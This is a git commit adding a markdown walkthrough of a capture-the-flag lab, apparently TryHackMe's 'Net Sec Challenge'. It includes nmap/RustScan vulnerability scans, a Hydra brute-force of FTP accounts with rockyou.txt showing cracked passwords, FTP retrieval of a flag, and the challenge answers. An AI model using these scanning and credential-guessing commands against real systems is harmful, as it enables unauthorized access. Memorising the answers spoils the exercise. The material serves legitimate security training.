net sec challenge
This commit is contained in:
parent
7cc8a53f93
commit
7c2a0930a6
|
@ -0,0 +1,96 @@
|
|||
# Net Sec Challenge
|
||||
|
||||
## Challenge Questions
|
||||
|
||||
I'll do a `tools/enumeration/RustScan/target/release/rustscan -a 10.10.185.143 -u 5000 -- -sC -sV --vv --script vuln` which delivers nearly all the answers to the following questions.
|
||||
|
||||
### What is the highest port number being open less than 10,000?
|
||||
```
|
||||
8080
|
||||
```
|
||||
|
||||
### There is an open port outside the common 1000 ports; it is above 10,000. What is it?
|
||||
```
|
||||
10021
|
||||
```
|
||||
|
||||
### How many TCP ports are open?
|
||||
These scanned protocols on the ports are all based on TCP.
|
||||
```
|
||||
6
|
||||
```
|
||||
|
||||
### What is the flag hidden in the HTTP server header?
|
||||
```sh
|
||||
80/tcp open http syn-ack lighttpd
|
||||
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|
||||
|_http-server-header: lighttpd THM{web_server_25352}
|
||||
```
|
||||
|
||||
### What is the flag hidden in the SSH server header?
|
||||
```sh
|
||||
SF-Port22-TCP:V=7.92%I=7%D=10/16%Time=616A0C7A%P=x86_64-pc-linux-gnu%r(NUL
|
||||
SF:L,29,"SSH-2\.0-OpenSSH_8\.2p1\x20THM{946219583339}\r\n");
|
||||
```
|
||||
```
|
||||
THM{946219583339}
|
||||
```
|
||||
### We have an FTP server listening on a nonstandard port. What is the version of the FTP server?
|
||||
|
||||
* `10021/tcp open ftp syn-ack vsftpd 3.0.3`
|
||||
```
|
||||
vsftp 3.0.3
|
||||
```
|
||||
|
||||
### We learned two usernames using social engineering: eddie and quinn. What is the flag hidden in one of these two account files and accessible via FTP?
|
||||
|
||||
Some bruteforcing via hydra
|
||||
```sh
|
||||
[whackx@manbox ~]$ hydra -L users -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ftp://10.10.185.143:10021
|
||||
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
|
||||
|
||||
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-16 01:35:05
|
||||
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
|
||||
[DATA] max 16 tasks per 1 server, overall 16 tasks, 28688796 login tries (l:2/p:14344398), ~1793050 tries per task
|
||||
[DATA] attacking ftp://10.10.185.143:10021/
|
||||
[10021][ftp] host: 10.10.185.143 login: eddie password: jordan
|
||||
[10021][ftp] host: 10.10.185.143 login: quinn password: andrea
|
||||
1 of 1 target successfully completed, 2 valid passwords found
|
||||
[WARNING] Writing restore file because 8 final worker threads did not complete until end.
|
||||
[ERROR] 8 targets did not resolve or could not be connected
|
||||
[ERROR] 0 target did not complete
|
||||
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-10-16 01:35:36
|
||||
```
|
||||
|
||||
Log in as `quinn`, download the flag via `get ftp_flag.txt`.
|
||||
```
|
||||
[whackx@manbox ~]$ ftp 10.10.185.143 10021
|
||||
Connected to 10.10.185.143.
|
||||
220 (vsFTPd 3.0.3)
|
||||
Name (10.10.185.143:whackx): quinn
|
||||
331 Please specify the password.
|
||||
Password:
|
||||
230 Login successful.
|
||||
Remote system type is UNIX.
|
||||
Using binary mode to transfer files.
|
||||
ftp> ls -la
|
||||
200 PORT command successful. Consider using PASV.
|
||||
150 Here comes the directory listing.
|
||||
drwxr-xr-x 2 1002 1002 4096 Sep 20 08:36 .
|
||||
drwxr-xr-x 2 1002 1002 4096 Sep 20 08:36 ..
|
||||
-rw-r--r-- 1 1002 1002 220 Sep 14 07:43 .bash_logout
|
||||
-rw-r--r-- 1 1002 1002 3771 Sep 14 07:43 .bashrc
|
||||
-rw-r--r-- 1 1002 1002 807 Sep 14 07:43 .profile
|
||||
-rw------- 1 1002 1002 723 Sep 20 08:27 .viminfo
|
||||
-rw-rw-r-- 1 1002 1002 18 Sep 20 08:27 ftp_flag.txt
|
||||
226 Directory send OK.
|
||||
```
|
||||
|
||||
### Browsing to http://10.10.185.143:8080 displays a small challenge that will give you a flag once you solve it. What is the flag?
|
||||
|
||||
At first, I tried to be stealthy with something like the following.
|
||||
```sh
|
||||
[whackx@manbox ~]$ sudo nmap -T1 -sN -ff 10.10.185.143 -vv
|
||||
```
|
||||
That did not not work. So, I spun up an attack box and iterated through every flag possible.
|
||||
At some point the flag came up on the website.
|
Loading…
Reference in New Issue